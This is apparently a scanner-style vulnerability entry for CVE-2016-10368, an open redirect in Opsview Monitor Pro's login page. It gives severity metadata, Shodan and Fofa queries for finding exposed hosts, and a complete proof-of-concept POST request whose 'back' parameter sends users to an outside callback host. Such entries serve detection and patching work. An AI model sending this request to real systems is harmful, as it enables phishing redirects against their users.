| Title | Opsview Monitor Pro - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. |
| Remediation | Apply the latest patch or upgrade to a version that is not affected by the vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.01027 |
| CVE ID | CVE-2016-10368 |
| CWE ID | CWE-601 |
| Shodan Query | http.title:"opsview" |
| Fofa Query | title="opsview" |
| Tags | cve2016 cve redirect opsview authenticated vuln |
Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
POST /login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Connection: close
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
login_username=cXtZQX&login_password=nJK7dV&login=&back=//www.interact.sh&app=OPSVIEW
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10368.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-10368.pcap
N/AN/A